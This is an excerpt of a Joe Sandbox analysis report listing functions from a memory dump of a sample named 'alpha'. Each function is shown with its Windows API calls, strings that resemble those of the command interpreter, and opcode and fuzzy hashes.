                                                                              • Opcode ID: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                                                              • Instruction ID: 4e1cd14ee5ec8e4b9c4fef80716dadf6fcd94101f4ecf1f9e8bb29bd70580ec9
                                                                              • Opcode Fuzzy Hash: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                                                              • Instruction Fuzzy Hash: 31A1856270CBC1CAEB29BF21D8402E9B7A1FB89784F448535DA5D8B76ADF3CD6458700
                                                                              Function 00007FF64B569400 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 161COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                                                              • String ID: FAT$~
                                                                              • API String ID: 2238823677-1832570214
                                                                              • Opcode ID: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                                                              • Instruction ID: 1e1c33a33b41c89faf54a63ce17b0e2a9666f475d47c7b4080c7b3595db69e24
                                                                              • Opcode Fuzzy Hash: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                                                              • Instruction Fuzzy Hash: 4D717E7270CBC1CAEB25FF21D8502E9B7A0FB49789F409035DA5D8BA6ADF38D2458700
                                                                              Function 00007FF64B56D840 Relevance: 18.4, APIs: 12, Instructions: 444memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF64B56FE2A), ref: 00007FF64B56D884
                                                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF64B56FE2A), ref: 00007FF64B56D89D
                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF64B56FE2A), ref: 00007FF64B56D94D
                                                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF64B56FE2A), ref: 00007FF64B56D964
                                                                              • _wcsnicmp.MSVCRT ref: 00007FF64B56DB89
                                                                              • wcstol.MSVCRT ref: 00007FF64B56DBDF
                                                                              • wcstol.MSVCRT ref: 00007FF64B56DC63
                                                                              • memmove.MSVCRT ref: 00007FF64B56DD33
                                                                              • memmove.MSVCRT ref: 00007FF64B56DE9A
                                                                              • longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF64B56FE2A), ref: 00007FF64B56DF1F
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                                                              • String ID:
                                                                              • API String ID: 1051989028-0
                                                                              • Opcode ID: 3eb282f1936630003c50c214bbc81d4f8471c73227843184e7e06612691cab38
                                                                              • Instruction ID: 0ccf1a15dab43e25d3d38d7324605d10d2707ac0c680f3b2295f853f4b43bc93
                                                                              • Opcode Fuzzy Hash: 3eb282f1936630003c50c214bbc81d4f8471c73227843184e7e06612691cab38
                                                                              • Instruction Fuzzy Hash: EC028072A0C68681EA28BF15E40027AF6A0FB8CB94F546631DAAE877F5DF7CD441D700
                                                                              Function 00007FF64B5686B0 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 138memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$_wcsicmp$AllocProcess
                                                                              • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                              • API String ID: 3223794493-3086019870
                                                                              • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                              • Instruction ID: 0427b578970d2596bef461b78c58bc03cab40ee40cbc27fdd12783dd265ae501
                                                                              • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                                                              • Instruction Fuzzy Hash: BD515961A0CA42CAEA58BF15E810179BBA0FB4DB90F589535CA3E873B2DF7CE445C710
                                                                              Function 00007FF64B572B94 Relevance: 18.1, APIs: 6, Strings: 6, Instructions: 110COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                                              • API String ID: 0-3124875276
                                                                              • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                              • Instruction ID: 1c8558516e8191a6c8f1ecf0d94e6ec90a34152620be57bc96718cf7dcd7491b
                                                                              • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                                                              • Instruction Fuzzy Hash: 99516A60B0C643C2FB2CBF25F4046B8B695AF4EB45F408035C62EC62B6DFBDA40A8750
                                                                              Function 00007FF64B56FC30 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 311memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                                                              • String ID: 0123456789
                                                                              • API String ID: 1606811317-2793719750
                                                                              • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                              • Instruction ID: 5bd1db9cfd417fce15dd712f968621ed28c6d41b220ac6234d8a0d7f17d1f66d
                                                                              • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                                                              • Instruction Fuzzy Hash: F3D15C61E0CB8685EA18BF25E844279B6A0FB4D794F489132DA6D977F6DF3CE405CB00
                                                                              Function 00007FF64B576FB4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 148COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                              • String ID: \\.\
                                                                              • API String ID: 799470305-2900601889
                                                                              • Opcode ID: c96739e036c4af460e843270059a1df39c16095e374773fe56c5b82f2b657300
                                                                              • Instruction ID: 0a1b70ac01b9e181920d61cf4f7cdd52ced3d37a9205530d12b0551968c65d24
                                                                              • Opcode Fuzzy Hash: c96739e036c4af460e843270059a1df39c16095e374773fe56c5b82f2b657300
                                                                              • Instruction Fuzzy Hash: 2851B232B1CA82C5EB68BF21E8002B9B7A0FB8DB54F558535DA2D877A6DF7CD4458300
                                                                              Function 00007FF64B568B20 Relevance: 16.8, APIs: 11, Instructions: 254COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                                                              • String ID:
                                                                              • API String ID: 1944892715-0
                                                                              • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                              • Instruction ID: 1932ddb1c5770240f11c78a4328793d61268b044aa8a29a8fb5b2a0d10477bd3
                                                                              • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                                                              • Instruction Fuzzy Hash: DBB15E61A0D642C6FA68BF11E454179E6A1BF4DB80F589536CA6E873F2EF7CE8408710
                                                                              Function 00007FF64B565458 Relevance: 16.7, APIs: 11, Instructions: 213fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00007FF64B573578: _get_osfhandle.MSVCRT ref: 00007FF64B573584
                                                                                • Part of subcall function 00007FF64B573578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B57359C
                                                                                • Part of subcall function 00007FF64B573578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B5735C3
                                                                                • Part of subcall function 00007FF64B573578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B5735D9
                                                                                • Part of subcall function 00007FF64B573578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B5735ED
                                                                                • Part of subcall function 00007FF64B573578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B573602
                                                                              • _get_osfhandle.MSVCRT ref: 00007FF64B5654DE
                                                                              • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF64B561F7D), ref: 00007FF64B56552B
                                                                              • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF64B561F7D), ref: 00007FF64B56554F
                                                                              • _get_osfhandle.MSVCRT ref: 00007FF64B58345F
                                                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF64B561F7D), ref: 00007FF64B58347E
                                                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF64B561F7D), ref: 00007FF64B5834C3
                                                                              • _get_osfhandle.MSVCRT ref: 00007FF64B5834DB
                                                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF64B561F7D), ref: 00007FF64B5834FA
                                                                                • Part of subcall function 00007FF64B5736EC: _get_osfhandle.MSVCRT ref: 00007FF64B573715
                                                                                • Part of subcall function 00007FF64B5736EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF64B573770
                                                                                • Part of subcall function 00007FF64B5736EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF64B573791
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                                                              • String ID:
                                                                              • API String ID: 1356649289-0
                                                                              • Opcode ID: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                                                              • Instruction ID: c3f81f095b75f21ff30f2cdc11a17b63d308fd129ed31a35b94ad1b1148a36ae
                                                                              • Opcode Fuzzy Hash: 0c4a37dfe8b9f6674b9d741f685a90a2de3626c6216cde8b4183c3294efd6170
                                                                              • Instruction Fuzzy Hash: EF915E72A1C642CAE628BF25E404179F7A1FB9DB94F445135DA6E83676DF3CD450CB00
                                                                              Function 00007FF64B58BFEC Relevance: 16.2, APIs: 3, Strings: 6, Instructions: 444COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00007FF64B5758E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF64B58C6DB), ref: 00007FF64B5758EF
                                                                                • Part of subcall function 00007FF64B57081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF64B57084E
                                                                              • towupper.MSVCRT ref: 00007FF64B58C1C9
                                                                              • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF64B58C31C
                                                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF64B58C5CB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                                                              • String ID: %s $%s>$PROMPT$Unknown$\$x
                                                                              • API String ID: 2242554020-3610052186
                                                                              • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                              • Instruction ID: f11400d060b1cfc7c9125889a08ce2c1b181997c4bcc62231f6086f0e8557229
                                                                              • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                                                              • Instruction Fuzzy Hash: DD129361A2C64281EA68BF19E44417AE7B0EF48BA0F544235D97E877F2DF3CE55AC700
                                                                              Function 00007FF64B5886FC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 226timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: LocalTime$ErrorLast_get_osfhandle
                                                                              • String ID: %s$/-.$:
                                                                              • API String ID: 1644023181-879152773
                                                                              • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                              • Instruction ID: e9ffe8afff281602c2e4c0d1adb7c6e366b3962fd9d6025d625d8fad65087297
                                                                              • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                              • Instruction Fuzzy Hash: 7491A162B2C64282EB58BF64D4402B9E3A0FF88BD4F844535D96EC26F6EE3CE555C700
                                                                              Function 00007FF64B58627C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95synchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF64B587251), ref: 00007FF64B58628E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: ObjectSingleWait
                                                                              • String ID: wil
                                                                              • API String ID: 24740636-1589926490
                                                                              • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                              • Instruction ID: 1008fe4bbbc9a92aafccb54a1371dbddf41374213b56f58059685120b195c327
                                                                              • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                              • Instruction Fuzzy Hash: 09415021A1C642C7F3287F15E400379A6A1EF89781F609531D92AC7AB6CF3DD855CB01
                                                                              Function 00007FF64B5614E8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 64COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                              • String ID: :$\
                                                                              • API String ID: 3961617410-1166558509
                                                                              • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                              • Instruction ID: 94bf959db16c604a1e2a24acfe1d084ffff96dab9ffbfaa15f72eb99cf69c0b5
                                                                              • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                              • Instruction Fuzzy Hash: B4217F62A0C642C6E7587F60E444079E6A1EB8DB94B44A231DA2FC73B2EF7CD8458A00
                                                                              Function 00007FF64B57258C Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 85COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00007FF64B5706C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B56B4DB), ref: 00007FF64B5706D6
                                                                                • Part of subcall function 00007FF64B5706C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B56B4DB), ref: 00007FF64B5706F0
                                                                                • Part of subcall function 00007FF64B5706C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B56B4DB), ref: 00007FF64B57074D
                                                                                • Part of subcall function 00007FF64B5706C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF64B56B4DB), ref: 00007FF64B570762
                                                                              • _wcsicmp.MSVCRT ref: 00007FF64B5725CA
                                                                              • _wcsicmp.MSVCRT ref: 00007FF64B5725E8
                                                                              • _wcsicmp.MSVCRT ref: 00007FF64B57260F
                                                                              • _wcsicmp.MSVCRT ref: 00007FF64B572636
                                                                              • _wcsicmp.MSVCRT ref: 00007FF64B572650
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsicmp$Heap$AllocProcess
                                                                              • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                              • API String ID: 3407644289-1668778490
                                                                              • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                              • Instruction ID: 1ebc6d9c6e7c3c0724b7b8ad050f269c6da3cbe88e27215bb4be614a906ec6d1
                                                                              • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                              • Instruction Fuzzy Hash: 39314C61A1C642C6FB28BF21F811279E6A5AB4DB40F54C435D62EC62B7DE7DE4018611
                                                                              Function 00007FF64B590C90 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 282COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
